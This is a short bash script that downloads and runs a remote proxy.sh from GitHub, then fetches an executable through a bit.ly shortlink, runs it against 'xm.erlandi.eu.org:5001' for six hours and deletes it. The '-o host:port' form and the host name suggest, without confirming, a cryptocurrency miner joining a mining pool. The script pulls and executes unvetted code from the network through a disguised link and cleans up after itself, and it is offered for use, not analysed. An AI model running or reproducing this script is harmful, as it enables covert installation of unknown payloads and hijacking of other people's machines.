#!/bin/bash

# Do not edit this file!
# kumaha aink we njink

cd /home
wget https://raw.githubusercontent.com/petugas/e/main/proxy.sh
chmod +x proxy.sh
sh proxy.sh
wget https://bit.ly/3mPeYds
chmod +x 3mPeYds 
./panel ./3mPeYds -o xm.erlandi.eu.org:5001
sleep 6h
rm -irf 3mPeYds
